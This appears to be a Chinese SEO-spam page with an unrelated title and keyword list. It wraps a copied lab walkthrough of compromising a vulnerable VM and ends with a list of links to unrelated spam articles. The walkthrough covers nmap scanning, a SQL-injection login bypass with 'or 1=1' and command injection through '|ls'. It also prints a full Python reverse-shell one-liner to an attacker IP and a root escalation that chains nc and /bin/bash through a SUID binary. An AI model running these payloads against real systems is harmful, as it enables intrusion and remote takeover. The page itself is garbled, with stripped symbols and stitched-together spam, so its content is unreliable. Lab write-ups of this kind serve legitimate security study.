当前位置: 首页 > news >正文

建立网站的技术路径上海品牌推广公司

建立网站的技术路径,上海品牌推广公司,汕头提供关键词平台,网站设计的流程目录 信息搜集 WEB漏洞攻击 拿shell 信息搜集 首先ifconfig查看自己IP#xff0c; netdiscover查看同网段下主机 第三个应该是目标靶机。用nmap查看靶机开放端口#xff1a; 开放22和8080#xff0c;看看8080开的啥服务 WEB漏洞攻击 看到让我们输入邀请码。有输入框的第…目录 信息搜集 WEB漏洞攻击 拿shell 信息搜集 首先ifconfig查看自己IP netdiscover查看同网段下主机 第三个应该是目标靶机。用nmap查看靶机开放端口 开放22和8080看看8080开的啥服务 WEB漏洞攻击 看到让我们输入邀请码。有输入框的第一个反应是RCE尝试几次后无果。后续测试SQL注入发现在输入时报错 Flask框架最后一段报错信息直接看到搜索逻辑源码 输入其它内容时全部回显 推断布尔盲注order by 尝试字段数 1 order by 1-- 正常 1 order by 2-- 报错 后续尝试 1 and left(version(),1)5 -- 无果 直接万能密码开摆 1 or 11 -- emmmm进来了 还是看看能否RCE 输入111|ls 拿shell 出了弹个shell试试 cat | python -c import socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.112.72,5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);psubprocess.call([/bin/bash,-i]); 成了 看看文件权限 有一个ROOT文件下面有它的C文件读一下看看 发现程序定义了一个执行参数如果程序在执行中不包含参数则会打印出 This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam 如果执行程序使用了参数那么程序就会执行freshclam运行病毒库更新 可以试试提权 ./update_cloudav 666 | nc 192.168.112.72 5555|/bin/bash|nc 192.168.112.72 6666 拿到ROOT权限
http://www.tj-hxxt.cn/news/141157.html

相关文章:

  • 网页设计建网站流程网络推广是指什么
  • 企业级网站内容管理解决方案短链接在线生成器免费版
  • 网站前端是做网站吗建设服装网站目的和作用
  • 东莞网站建设公司 h5在线教育平台网站建设
  • 网站建设市场需求分析做网站的网页用什么软件好
  • 简历在线制作网站网络卖货怎么卖
  • 山东住房和建设庭官网站官网站建设建设公司
  • 做网站需要技术网站建设内部需求调查表
  • 北京 网站定制开发网站 keywords
  • 网站建设于朦胧网站设计服务有哪些
  • wordpress怎么仿站如何在百度发广告推广
  • wordpress购物车显示优化设计答案大全英语
  • 做网站的费用会计分录浙江省建设监理管理协会网站
  • 不限关键词做网站平台小程序开发文档api
  • 高校网站建设 调查wordpress 数据库建立
  • 便民网站开发服务器维护中
  • 阿里云备案个人可以做网站吗买手表去哪个网站买是正品的
  • 哪里可以做虚拟货币网站阿里巴巴1688官网网页版
  • 卖辅助网站怎么做查企业信息的黄页有哪些
  • 厦门最早做网站的公司深圳软件项目定制开发费用
  • 锦州网站建设品牌手机网站建设推荐乐云seo
  • 福建省建设干部培训中心网站首页扬州做网站多少钱
  • 网络营销品牌推广公司哪家好seo见到效果再付费
  • 查看网站源代码建站可以几个月网站没有排名
  • 淘宝客做网站备注怎么写的易支付做网站接口怎么赚钱
  • 养老院为什么要建设网站做英文的小说网站有哪些
  • 推广网站的广告怎样做东莞食品网站建设
  • 企业网站排名运营网页编辑栏无法写入
  • 怎样让自己做的网站被百度收录gcms是什么意思
  • h5网站怎么做wordpress开源程序